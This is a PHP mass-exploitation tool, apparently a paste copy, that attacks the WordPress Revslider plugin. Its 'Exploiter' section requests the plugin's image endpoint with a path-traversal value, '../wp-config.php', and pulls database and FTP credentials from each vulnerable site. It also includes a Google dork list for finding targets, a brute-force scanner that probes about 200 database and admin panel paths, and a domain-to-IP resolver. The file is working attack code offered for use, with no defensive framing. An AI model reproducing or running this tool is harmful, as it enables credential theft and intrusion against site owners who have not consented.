Revslider Exploiting by - An0x0r -

1. <?
2.  
3. echo"
4.  
5. <body bgcolor='#000000' text='white'>
6.  
7. <title>Revslider Exl0it1ng [ An0x0r ]</title>
8.  
9. <style>
10.  
11. body,table{background: black; }
12.  
13. A:link {text-decoration: none;color: red;}
14.  
15. A:active {text-decoration: none;color: red;}
16.  
17. A:visited {text-decoration: none;color: red;}
18.  
19. A:hover {text-decoration: underline; color: red;}
20.  
21. #new,input,textarea,table,td,tr,#gg
22.  
23. {
24.  
25. border-style:solid;
26.  
27. text-decoration:bold;
28.  
29. }
30.  
31. input:hover,tr:hover,td:hover,textarea:hover
32.  
33. {
34.  
35. background-color: #FFFFCC;
36.  
37. color:green;
38.  
39. size:10px;
40.  
41. }
42.  
43. </style>
44.  
45. <center><img src='http://im72.gulfup.com/zwchBZ.png' height='250' width='295'></img><br>
46.  
47. <!--- Menu -----!--->
48.  
49. <p align='center' dir='ltr'>
50.  
51. <font face='Verdana' size='2' color='#FFFFFF'>#
52.  
53. <a href='?ma=scan' style='text-decoration: none'><font color='#006699'>IP Scanner</font></a> ~
54.  
55. <a href='?ma=exp' style='text-decoration: none'><font color='#006699'>Exploiter</font></a> ~ </font>
56.  
57. <font face='Verdana' size='2' color='#006699'>
58.  
59. <a href='?ma=db' style='text-decoration: none'><font color='#006699'>Find DB Panel</font></a><font face='Verdana' size='2' color='#FFFFFF'> ~ </font>
60.  
61. <font face='Verdana' size='2' color='#006699'>
62.  
63. <a href='?ma=dorks' style='text-decoration: none'><font color='#006699'>Exploit Dorks</font></a></font>
64.  
65.  
66.  
67.  
68.  
69.  
70.  
71. <font face='Verdana' size='2' color='#FFFFFF'> ~ </font>
72.  
73. <font face='Verdana' size='2' color='#006699'>
74.  
75. <a href='?ma=toip' style='text-decoration: none'><font color='#006699'>Domains 2 IP</font></a></font>
76.  
77.  
78.  
79.  
80.  
81.  
82.  
83. <font face='Verdana' size='2' color='#FFFFFF'> # </font>
84.  
85. <br><br>
86.  
87. ";
88.  
89.  
90.  
91.  
92.  
93. /////////////////////////////////
94.  
95. if ($_GET['ma'] == 'exp') {
96.  
97. echo"<form method='post'>
98.  
99. <textarea name='sites' cols='50' rows='12'></textarea><br>
100.  
101. <input type='submit' name='go' value='Exploit'>
102.  
103. </form>";
104.  
105. function findit($mytext,$starttag,$endtag) {
106.  
107. $posLeft = stripos($mytext,$starttag)+strlen($starttag);
108.  
109. $posRight = stripos($mytext,$endtag,$posLeft+1);
110.  
111. return substr($mytext,$posLeft,$posRight-$posLeft);
112.  
113. }
114.  
115. error_reporting(0);
116.  
117. set_time_limit(0);
118.  
119. $ya=$_POST['go'];
120.  
121. $co=$_POST['sites'];
122.  
123.  
124.  
125. if($ya){
126.  
127. $e=explode("\r\n",$co);
128.  
129. foreach($e as $bda){
130.  
131. //echo '<br>'.$bda;
132.  
133. /// you can devlope the tool ///
134.  
135. $linkof='/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php';
136.  
137. $dn=($bda).($linkof);
138.  
139. $file=@file_get_contents($dn);
140.  
141. if(eregi('DB_HOST',$file) and !eregi('FTP_USER',$file) ){
142.  
143. echo"<center><font color=green face=Verdana size=-2>Infected ! </font></center>";
144.  
145. echo "<center><font face=Verdana size=-2 color='#00BFFF' >".$bda."</font></center>";
146.  
147. echo "<font face=Verdana size=-2 color=lime >DB name : </font>".findit($file,"DB_NAME', '","');")."<br>";
148.  
149. echo "<font face=Verdana size=-2 color=lime >DB user : </font>".findit($file,"DB_USER', '","');")."<br>";
150.  
151. echo "<font face=Verdana size=-2 color=lime >DB pass : </font>".findit($file,"DB_PASSWORD', '","');")."<br>";
152.  
153. echo "<font face=Verdana size=-2 color=lime >DB host : </font>".findit($file,"DB_HOST', '","');")."<br>";
154.  
155. }
156.  
157. elseif(eregi('DB_HOST',$file) and eregi('FTP_USER',$file)){
158.  
159. echo'<center><font color=silver face=Verdana size=2>----------------------------------------------</font></center>';
160.  
161. echo"<center><font color=green face=Verdana size=-2>Infected ! </font></center>";
162.  
163. echo "<center><font face=Verdana size=-2 color='#00BFFF' >".$bda."</font></center>";
164.  
165. echo "<font face=Verdana size=-2 color=lime >FTP user : </font>".findit($file,"FTP_USER','","');")."<br>";
166.  
167. echo "<font face=Verdana size=-2 color=lime >FTP pass : </font>".findit($file,"FTP_PASS','","');")."<br>";
168.  
169. echo "<font face=Verdana size=-2 color=lime >FTP host : </font>".findit($file,"FTP_HOST','","');")."<br>";
170.  
171. }
172.  
173. else{
174.  
175. echo'<center><font color=silver face=Verdana size=2>----------------------------------------------</font></center>';
176.  
177. echo "<center><font color=yellow face=Verdana size=-2>".$bda."</font><font color=white face=Verdana size=-2> ==> </font><font color=red face=Verdana size=-2>Not Infected ! </font></center>";}
178.  
179. echo'<center><font color=silver face=Verdana size=2>----------------------------------------------</font></center>';
180.  
181. }
182.  
183.  
184.  
185. }
186.  
187. }
188.  
189. /////////////////////////////////////
190.  
191.  
192.  
193. /////////////////////////////////////
194.  
195. if ($_GET['ma'] == 'dorks') {
196.  
197. echo'<br><textarea cols=50 rows=12 >
198.  
199. inurl:wp-content/plugins/revslider/
200.  
201. inurl:revslider
202.  
203. inurl:revslider_admin.php
204.  
205. inurl:revslider_front.php
206.  
207. inurl:plugins/revslider/
208.  
209. intext:Powered by Revslider
210.  
211. intitle:"Index Of/ revslider"
212.  
213. intitle:"Index Of/wp-content/themes/revslider"
214.  
215. intitle:"Index Of/wp-content/plugins/revslider"
216.  
217. intitle:"Index Of/admin/revslider"
218.  
219. intitle:"Index Of/fr/revslider"
220.  
221. intitle:"Index Of/en/revslider"
222.  
223. intitle:"Index Of/us/revslider"
224.  
225. intitle:"Index Of/ar/revslider"
226.  
227. intitle:"Index Of/es/revslider"
228.  
229. intitle:"Index Of/de/revslider"
230.  
231. </textarea>';
232.  
233.  
234.  
235. }
236.  
237. //////////////////////////////////////
238.  
239.  
240.  
241. //////////////////////////////////////
242.  
243. if ($_GET['ma'] == 'toip') {
244.  
245. echo"
246.  
247. <form method='post' ><center>
248.  
249. <textarea cols='50' rows='12' name='site2ip' >www.example.com
250.  
251. Please Romove http:// or https://</textarea></br><br>
252.  
253. <input type='submit' name='w2ip' value='Extract' ><br>
254.  
255. </center>";
256.  
257. if(isset($_POST['site2ip'])){
258.  
259. foreach(explode("\n",$_POST['site2ip']) as $site4ip){
260.  
261. $ipp=trim($site4ip);
262.  
263. echo '<font color="red" size="3"></font><font color="green" size="5"><center>
264.  
265. <font color="Blue" size="3"</font><font color=Green face=Verdana size=-2>'.$ipp.'</font>
266.  
267. <font color=white face=Verdana size=-2> ==> </font> <font color=Green face=Verdana size=-2>'.gethostbyname ($ipp).'</font></center></font>';
268.  
269. }
270.  
271. }
272.  
273. }
274.  
275. ////////////////////////////////////
276.  
277.  
278.  
279. ////////////////////////////////////
280.  
281. if ($_GET['ma'] == 'db') {
282.  
283.  
284.  
285.  
286.  
287. echo'
288.  
289. <form action ="" method="post">
290.  
291. <font face=Verdana size=-2 color=wgite >URL : <input type ="text" name="site"/>
292.  
293. <input type = "submit" value="Find" />
294.  
295. </form>';
296.  
297. $site = $_POST['site'];
298.  
299. $list = array(
300.  
301. '/phpMyAdmin/',
302.  
303. '/phpmyadmin/',
304.  
305. '/PMA/',
306.  
307. '/pma/',
308.  
309. '/admin/',
310.  
311. '/dbadmin/',
312.  
313. '/DB_ADMIN/',
314.  
315. '/db_admin/',
316.  
317. '/DBA/',
318.  
319. '/SQLI/',
320.  
321. '/dba/',
322.  
323. '/sqli/',
324.  
325. '/mysql/',
326.  
327. '/myadmin/',
328.  
329. '/phpmyadmin2/',
330.  
331. '/phpMyAdmin2/',
332.  
333. '/phpMyAdmin-2/',
334.  
335. '/php-my-admin/',
336.  
337. '/phpMyAdmin-2.2.3/',
338.  
339. '/phpMyAdmin-2.2.6/',
340.  
341. '/phpMyAdmin-2.5.1/',
342.  
343. '/phpMyAdmin-2.5.4/',
344.  
345. '/phpMyAdmin-2.5.5-rc1/',
346.  
347. '/phpMyAdmin-2.5.5-rc2/',
348.  
349. '/phpMyAdmin-2.5.5/',
350.  
351. '/phpMyAdmin-2.5.5-pl1/',
352.  
353. '/phpMyAdmin-2.5.6-rc1/',
354.  
355. '/phpMyAdmin-2.5.6-rc2/',
356.  
357. '/phpMyAdmin-2.5.6/',
358.  
359. '/phpMyAdmin-2.5.7/',
360.  
361. '/phpMyAdmin-2.5.7-pl1/',
362.  
363. '/phpMyAdmin-2.6.0-alpha/',
364.  
365. '/phpMyAdmin-2.6.0-alpha2/',
366.  
367. '/phpMyAdmin-2.6.0-beta1/',
368.  
369. '/phpMyAdmin-2.6.0-beta2/',
370.  
371. '/phpMyAdmin-2.6.0-rc1/',
372.  
373. '/phpMyAdmin-2.6.0-rc2/',
374.  
375. '/phpMyAdmin-2.6.0-rc3/',
376.  
377. '/phpMyAdmin-2.6.0/',
378.  
379. '/phpMyAdmin-2.6.0-pl1/',
380.  
381. '/phpMyAdmin-2.6.0-pl2/',
382.  
383. '/phpMyAdmin-2.6.0-pl3/',
384.  
385. '/phpMyAdmin-2.6.1-rc1/',
386.  
387. '/phpMyAdmin-2.6.1-rc2/',
388.  
389. '/phpMyAdmin-2.6.1/',
390.  
391. '/phpMyAdmin-2.6.1-pl1/',
392.  
393. '/phpMyAdmin-2.6.1-pl2/',
394.  
395. '/phpMyAdmin-2.6.1-pl3/',
396.  
397. '/phpMyAdmin-2.6.2-rc1/',
398.  
399. '/phpMyAdmin-2.6.2-beta1/',
400.  
401. '/phpMyAdmin-2.6.2-rc1/',
402.  
403. '/phpMyAdmin-2.6.2/',
404.  
405. '/phpMyAdmin-2.6.2-pl1/',
406.  
407. '/phpMyAdmin-2.6.3/',
408.  
409. '/phpMyAdmin-2.6.3-rc1/',
410.  
411. '/phpMyAdmin-2.6.3/',
412.  
413. '/phpMyAdmin-2.6.3-pl1/',
414.  
415. '/phpMyAdmin-2.6.4-rc1/',
416.  
417. '/phpMyAdmin-2.6.4-pl1/',
418.  
419. '/phpMyAdmin-2.6.4-pl2/',
420.  
421. '/phpMyAdmin-2.6.4-pl3/',
422.  
423. '/phpMyAdmin-2.6.4-pl4/',
424.  
425. '/phpMyAdmin-2.6.4/',
426.  
427. '/phpMyAdmin-2.7.0-beta1/',
428.  
429. '/phpMyAdmin-2.7.0-rc1/',
430.  
431. '/phpMyAdmin-2.7.0-pl1/',
432.  
433. '/phpMyAdmin-2.7.0-pl2/',
434.  
435. '/phpMyAdmin-2.7.0/',
436.  
437. '/phpMyAdmin-2.8.0-beta1/',
438.  
439. '/phpMyAdmin-2.8.0-rc1/',
440.  
441. '/phpMyAdmin-2.8.0-rc2/',
442.  
443. '/phpMyAdmin-2.8.0/',
444.  
445. '/phpMyAdmin-2.8.0.1/',
446.  
447. '/phpMyAdmin-2.8.0.2/',
448.  
449. '/phpMyAdmin-2.8.0.3/',
450.  
451. '/phpMyAdmin-2.8.0.4/',
452.  
453. '/phpMyAdmin-2.8.1-rc1/',
454.  
455. '/phpMyAdmin-2.8.1/',
456.  
457. '/phpMyAdmin-2.8.2/',
458.  
459. '/sqlmanager/',
460.  
461. '/mysqlmanager/',
462.  
463. '/p/m/a/',
464.  
465. '/PMA2005/',
466.  
467. '/pma2005/',
468.  
469. '/dev/',
470.  
471. '/phpmanager/',
472.  
473. '/php-myadmin/',
474.  
475. '/phpmy-admin/',
476.  
477. '/webadmin/',
478.  
479. '/sqlweb/',
480.  
481. '/websql/',
482.  
483. '/webdb/',
484.  
485. '/mysqladmin/',
486.  
487. '/mysql-admin/',
488.  
489. '/mya/',
490.  
491. '/PhpMyAdmin/',
492.  
493. '/phpmyadmin/',
494.  
495. '/myadmin/',
496.  
497. '/mysql/',
498.  
499. '/sql/',
500.  
501. '/server/',
502.  
503. '/db/',
504.  
505. '/database/',
506.  
507. '/databases/',
508.  
509. '/adm/',
510.  
511. '/configuration/',
512.  
513. '/configure/',
514.  
515. '/administrator/',
516.  
517. '/login/',
518.  
519. '/moderator/',
520.  
521. '/controlpanel/',
522.  
523. '/adminpanel/',
524.  
525. '/admincontrol/',
526.  
527. '/fileadmin/',
528.  
529. '/data/',
530.  
531. '/postgresql/',
532.  
533. '/oracle/',
534.  
535. '/msssql/',
536.  
537. '/msaccess/',
538.  
539. '/sysadmin/',
540.  
541. '/serverdata/',
542.  
543. '/webadmin/',
544.  
545. '/admins/',
546.  
547. '/Database_Administration/',
548.  
549. '/WebAdmin/',
550.  
551. '/useradmin/',
552.  
553. '/sysadmins/',
554.  
555. '/admin1/',
556.  
557. '/system-administration/',
558.  
559. '/administrators/',
560.  
561. '/pgadmin/',
562.  
563. '/directadmin/',
564.  
565. '/staradmin/',
566.  
567. '/ServerAdministrator/',
568.  
569. '/SysAdmin/',
570.  
571. '/administer/',
572.  
573. '/LiveUser_Admin/',
574.  
575. '/sys-admin/',
576.  
577. '/typo3/',
578.  
579. '/panel/',
580.  
581. '/xlogin/',
582.  
583. '/smblogin/',
584.  
585. '/phpldapadmin/',
586.  
587. '/server_admin/',
588.  
589. '/database_administration/',
590.  
591. '/system_administration/',
592.  
593. '/ss_vms_admin_sm/',
594.  
595. '/adminarea/',
596.  
597. '/MySQL/',
598.  
599. '/mysql_admin/',
600.  
601. '/server_data/',
602.  
603. '/DB/',
604.  
605. '/DB1/',
606.  
607. '/DB2/',
608.  
609. '/DB3/',
610.  
611. '/DB4/',
612.  
613. '/DB5/',
614.  
615. '/DB6/',
616.  
617. '/DB7/',
618.  
619. '/DB8/',
620.  
621. '/DB9/',
622.  
623. '/DB0/',
624.  
625. '/db1/',
626.  
627. '/db2/',
628.  
629. '/db3/',
630.  
631. '/db4/',
632.  
633. '/db5/',
634.  
635. '/db6/',
636.  
637. '/db7/',
638.  
639. '/db8/',
640.  
641. '/db9/',
642.  
643. '/db0/',
644.  
645. '/mysql5/',
646.  
647. '/mysql4/',
648.  
649. '/root/',
650.  
651. '/apache/',
652.  
653. '/php/',
654.  
655. '/Apache/',
656.  
657. '/Php/',
658.  
659. '/apach/',
660.  
661. '/apachepanel/',
662.  
663. '/WEBSERVERS/',
664.  
665. '/DATABASE1/',
666.  
667. '/DATABASE2/',
668.  
669. '/DATABASE3/',
670.  
671. '/DATABASE4/',
672.  
673. '/DATABASE5/',
674.  
675. '/DATABASE6/',
676.  
677. '/DATABASE7/',
678.  
679. '/DATABASE8/',
680.  
681. '/DATABASE9/',
682.  
683. '/WEBDATA/',
684.  
685. '/WEB_DATA/',
686.  
687. '/webservers/',
688.  
689. '/database1/',
690.  
691. '/database2/',
692.  
693. '/database3/',
694.  
695. '/database4/',
696.  
697. '/database5/',
698.  
699. '/database6/',
700.  
701. '/database7/',
702.  
703. '/database8/',
704.  
705. '/database9/',
706.  
707. '/webdata/',
708.  
709. '/web_data/',
710.  
711. );
712.  
713.  
714.  
715. if(isset($site)){
716.  
717.  
718.  
719. foreach($list as $path => $test) {
720.  
721. $ch = curl_init();
722.  
723. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
724.  
725. curl_setopt($ch, CURLOPT_HEADER, 1);
726.  
727. curl_setopt($ch, CURLOPT_URL, $site.$test);
728.  
729. $result = curl_exec($ch);
730.  
731. curl_close($ch);
732.  
733. //print $url;
734.  
735. if (preg_match("/200 OK/", $result)){
736.  
737. echo "<b><font face=Verdana size=-2 color=green >[+]</font><font face=Verdana size=-2 color=silver > Found ==> </font><font face=Verdana size=-2 color=orange ><a>[ $site$test ]</A></font></b>";
738.  
739. }
740.  
741. else if (preg_match("/401 Unauthorized/", $result)) {
742.  
743. echo "<b><font face=Verdana size=-2 color=yellow >[!]</font><font face=Verdana size=-2 color=silver > Found ==> </font><font face=Verdana size=-2 color=orange ><a>[ $site$test ]</A></font><a>[ $site$test ]</A></font></b>";
744.  
745. echo "<b><font face=Verdana size=-2 color=red >[-]</font><font face=Verdana size=-2 color=silver > Nothing found on </font><font face=Verdana size=-2 color=orange ><a>[ $site$test ]</A></font><a>[$site$test]</a></font>";
746.  
747. }
748.  
749. }
750.  
751. echo "<br><b><u><font face=Verdana size=-2 color=#513912 >Scan Finished !</font></u></b>";
752.  
753. }
754.  
755.  
756.  
757.  
758.  
759. }
760.  
761. ////////////////////////////////////
762.  
763.  
764.  
765.  
766.  
767.  
768.  
769.  
770.  
771.  
772.  
773. if ($_GET['MA'] == 'scan') {
774.  
775.  
776.  
777. echo "<br><b><u><font face=Verdana size=-2 color=#513912 >You can Devlope the Wp IP Scanner or start you idea here and send to <a href=http://an0x0r1@gmail.com >an0x0r1@gmail.com </a> ....</font></u></b>";
778.  
779. }
780.  
781.  
782.  
783.  
784.  
785.  
786.  
787.  
788.  
789. ?>
790.  
791.  
792.  
793.  
794.  
795.  
796.  
797. <center>
798.  
799. <code style="position:fixed; left:0px; right:0px; bottom:0px; background:transparent); text-align:center; border-top: 0px solid #FF3300; border-bottom: 1px solid #FF3300">
800.  
801. <font color=#FF3300 size=1 face="Tahoma">Mass Revslider Plugin Exl0it1ng v1<font><font color=white size=1 face="Tahoma"> -</font><font color=gren size=1 face="Tahoma"> By An0x0r</font></code>
802.  
803. </center>